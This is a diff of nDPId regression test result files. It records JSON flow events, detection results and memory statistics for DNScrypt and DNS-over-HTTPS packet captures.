+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7580000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":577,"packets-processed":577,"total-skipped-flows":0,"total-l4-payload-len":185420,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":36,"total-updates":0,"current-active-flows":0,"total-active-flows":34,"total-idle-flows":34,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":243,"global_ts_msec":946739888204} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 577/577 @@ -249,9 +249,9 @@ ~~ total active/idle flows...: 34/34 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6067668 bytes -~~ total memory freed........: 6067668 bytes -~~ total allocations/frees...: 118961/118961 +~~ total memory allocated....: 6201302 bytes +~~ total memory freed........: 6201302 bytes +~~ total allocations/frees...: 121723/121723 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 4713 chars diff --git a/test/results/dnscrypt-v2.pcap.out b/test/results/dnscrypt-v2.pcap.out index bba683351..d3ae4a566 100644 --- a/test/results/dnscrypt-v2.pcap.out +++ b/test/results/dnscrypt-v2.pcap.out 
@@ -3,18 +3,18 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760521313,"flow_last_seen":946760521313,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760521313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01919{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946760521313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760521313,"pkt":"AABeAAEK6qmpVXFVCABFAARcbhBAALERNCZ\/AAABfwAAApb6FOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQpQUH1mr6e8OCu\/fibn8cYTAvsRcNZA8\/lTdO1zXx64xZvGw9jDVohyuD42K8UoR60NkNdqxmDm0qVliFWXizmljTn2lD7CTHoYDdzqjjkHmHHUYe7NejwHo7UzJLYj4uUoMZ5OBbpbxqfekl3zx\/Y\/4Zdyfk6\/03lvMbG9F2W\/akMw4XwHvq2g20\/z7ROpAn9pbnoIPgkT0bVLMUloa6KCu+fPabNALYQCzXjw1dWf3V3HgmcswkwsHKRU4IqCA\/69xcDmnZfgajXBSpNTdHGZU3HrpU7Y+zKoXZQEmeLc30bXeW5a9kf14ALJr7nP37xAYcN4G1BzEhKbbjiDg1A8CDSXiipFooV7yrAiiDZFfq27wAKZRhDngTzeslBwu2i9MUBFZfRNYKakWYXb0zhir5\/O29uGdH+oix0VAlOhQ1zI2Iy777Cmv9swWs1wCBkrJE\/94M4tHF8XTS+kICmBd4\/\/oCbnlEOyxgE0tpl\/nt7We2odNwl1bEewLva0FOnwrRvhVpfaOoXJc9u0J1yVggsuxaSQHVALa0pkLJp+\/KL1C5ympFZjeFktaMfNQOPv5Z3ESCDKvkHzBBiVXNmZyBQJjVm8OJ2VxCOFxQRcEAfIQp56nl1CI6spURDZCsZVp2WuwyXhdsymxVlmsZMvMariZ7h1rbuSEhdHqejvERJd+oAjcCDcUCZYn75DUrNO01fMsDJFP9eRjUktxwy4\/sGlfHHZsXsBQsVS+zNosEiqeQlMFWbk\/CQC\/Iy+m8JNr48sNXZTfXlgESJMZXIJGI3ZhFWluGHRiSLjWQPEgvt0+8gtmgy\/Sb56ZYrX4M7I0sBjqZhkP6vZD63SReYDlzFMUXd7hqpdFD+DjTIU374ZDUKt
owMci+TNbopqyz97shtgi2xwOH9hFddB1RkG4yQjJkESvH+dEwGDhiyuqu1jbA0SFR8P5u+YYRQ+42CE\/iBU+jTsoOwxLsuWVcddU3vstbXn6rqxHgTXYGQFfuQtZFvSdKWnmTw8z9w8zndi+uHY\/vuoYXfx78owiiwhQhGyfvFoeyz6rWetZHRBw8zdBPggojOpslDYBovfLfe36dR5k4GtMpkpWYRt2em7VCMyF\/XbQIJEmhp+Ako20cMzqWuCfInK3G1X2JqV5rUe\/hqwd4JCyxrYqNuTc0r7m\/tXkqg9Pt8Nefpg\/ArWfvW+92iTAzlNVO3aq1ykTtQZiIeO81hVzagjUmsfI9nbIftuGPqsEIReSMuv5dWv6UgqYAe4C\/Xx87KHRwvxYrw2wdoQQVmttjR1\/zLAosSHz6yXxjq3yFjyK9Klg3OqBxrG0xMTunO9JWWEVDj8mxnhWJ808mUKd\/9SGzIWV6hSgWaIDqMtm18GCQPG3sT0f23Y6zC5qmo="} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946760521327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946760521327,"pkt":"6qmpVXFVLGv1oHfACABFAAEMLuFAADYR8aV\/AAACfwAAARTplvoA+BE2cjZmbnZXajgKUFB9Zq+nvDgrv35wwPFkkokFr1FaigO8H+CEw9XZ9v94iKYdvhofH7\/r0T3rultZ9ZuMYw63KPKpYNyj1i2Vz2KxAnu1y9OcbN8hOMoWFrn1y\/BrWeycOMWNW\/UytoGW9Utt69PEyNka4RcvHRab4iJ\/YjjMR75dgU4mnlrydsdtgAPjXq8XLISW7\/42LpWK7O03ro1N2Q0h\/PZQAkZ8Yr116m7rrS+wia4dqoRvx+npPzTL2uTXQZk6coE4bD7nXs83zCQTiFsawPIKEo\/Czq95ZoX+83ElbKp2Lf2x5F0tvUmYWWas"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760521327,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760521327,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605202,"flow_last_seen":946760605202,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760605202,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01903{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946760605202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760605202,"pkt":"AABeAAEK6qmpVXFVCABFAARcltdAALMRCV9\/AAABfwAAAqeDFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRfk4LvVMuzYHCM64aFNA6T05d8hUdeyA7alWJw86lEbUjUkUtbT59kH5jmUMy6TBNbA9cSZ8ylHF4RX6cVC46FgRWMG7UkBiuIGCYSDYj0qQHCgV\/uKPkd7y7W+9OzpH8mUK0FHIW++OejSvieZlNNJ7hSMqQWE6z3iyVzPN5bD2KljIJn1iUmfgz+QxSJuRx84RGS6ZLYT438yRBqXYq0Vwk3xAT2MdCKiMuYMGqjTyP8B2grnXj9xxXxku1yj6OtSn3nAOQMgpYIcCjgnWS0cRJegnnM5D0O11ZfcQB4Fewco0pEjSFK7kZnpZjtiHj5j7TxqMO4Vn4k86uxQk9GVEN2zODOYc\/yyQRJRQS1vdmwbB8pH1RY9RWIX7c72Uu8J9lT3tB12jgWk7JcvRj3kqUYiVaVTscNevFtQUPd0pSnuajXrJ+hzFBHsYRtQDq\/qTDyuwyCgb8nIkKE96dBEolcLL26\/EMH1RIcplKkl5QSamD4VBOpG8DQ1KIQd5gIQLhlPX6KKqy7L6Do2tx+7dCgtxx1E2Br5zMvuZ\/kHhX+MLJOr0\/iwBeAlPpj1PTcK\/rpOP\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\/Kdg8neHvERpHgJtjc6onWBEeYVMSOIgY3FsrOPw8Z+8m14x9gAOfHtLW669SkRJ\/5Oy1nHFue3eMdLOD17GsJC9ipo8Nt7h+s4mrZ48orMsFI5zdxcpuO5qIX7Jeo5cM7okkhYTz8e15mkxVdno5gBtUAf8t\/L2X1vjjlcGsVoQKrJmRP1jJTumUkNQcgjkM9fu5JPFOO495nbtE9aMELyNvGpZMayoVzo0osCoDkba4s3ZTHe2irNjakWpfqIdatMniQsiKVkXUcZgJzdhkXaFhlfKxLQ3rNM="} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946760605216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946760605216,"pkt":"6qmpVXFVLGv1oHfACABFAADMP0VAADYR4YF\/AAACfwAAARTpp4MAuJEqcjZmbnZXajj5OC71TLs2BwjOuGgg3QrBP5tprFLasOGCi79PkXAdV2PVq+xNqpM\/kysCzgq0+LOYozLThXw1WZc0FtoVVEapHJrtR+84oNppbLRDK7JMS7PVvGlgxZODr7UkO1B\/D0uRd283CHNw\/vIL9BRqAsong3oxZiw5zr2Y3a2cdTof4h\/tWWCDrx7A7RBVG\/GNrFPjnEGOMX+8J1XSUzpJoAL2W7tia8a8E6E="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605285,"flow_last_seen":946760605285,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760605285,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946760605285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760605285,"pkt":"AABeAAEK6qmpVXFVCABFAARclutAALMRCUt\/AAABfwAAAsbNFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQw0qtTPgEfkm2BM74ld5CA+W62jGSnjSdoiN3bn9c9nxUkSoDVOuV\/3s7ElHCemxe0UkD1LvUy8p8mkYiyJByZqh\/TL+tyM9BYbJLyKl4eVVVUmkWzlIkQ8\/WuhnpFa3Pnl4FCof4Z1AFcjqWHjHTbQ00s\/sO6ObqcqEHiFQ3+hFKPz9bBRBZWfeqEU3hWWN4OunVcVjBVIH+oyNnf9Ldqyao3Hv1uVLcFryZLWtSTQ+TUZP7RHtGoj4axNiM4Sz7wu2+uP+AibNzkF1m9ssUSp2rQ7tNTH+uxSW1kUeR+13R3ypCAFwJqw\/VTXgzMfvcjuBPHrlpMxG36nZL\/+zwmhxqACloTIurY1g7wfxGufh02FIVF4K+Jc183KeSLvKymakWl1jrazrxgKDGwzCmkm\/qXsOyxoyVo59boGN73vaAXF8yLnk\/4vNz04JxTScUka4TOHKUXW8ZZ543tFdfRvtM2NKx84KnERvuwI\/uotbd04NQpoVtEiRRZMADKfart6vq32P23lHeY6n+mIbu2PA0gvFaxx5jWM3JmDKSD0o30ViNPe03NlnYSlQiW5FJ\/53xHptvxGrdm48kY+bJUL4BJa9O5+PfC0wB2a+yNdgtZ8d2Ojegp\/kYc3D4fTqTKjslUMThhuPbtzJcJR7XXfKIBDV5cnnDp7d+CI2Oar3wr\/zAoz9VHG24IjueUhl9sB9wO4qD\/KiPSpxNze8cwgJ24e6LGZ2e3Ay\/9kJIVk41uXqrdi54bVgXRXtvYhvorxpHXFV0LMZL2KCV8o9YlluRovDnaKb2GjLy3\/KKvuxcfe8RkRT3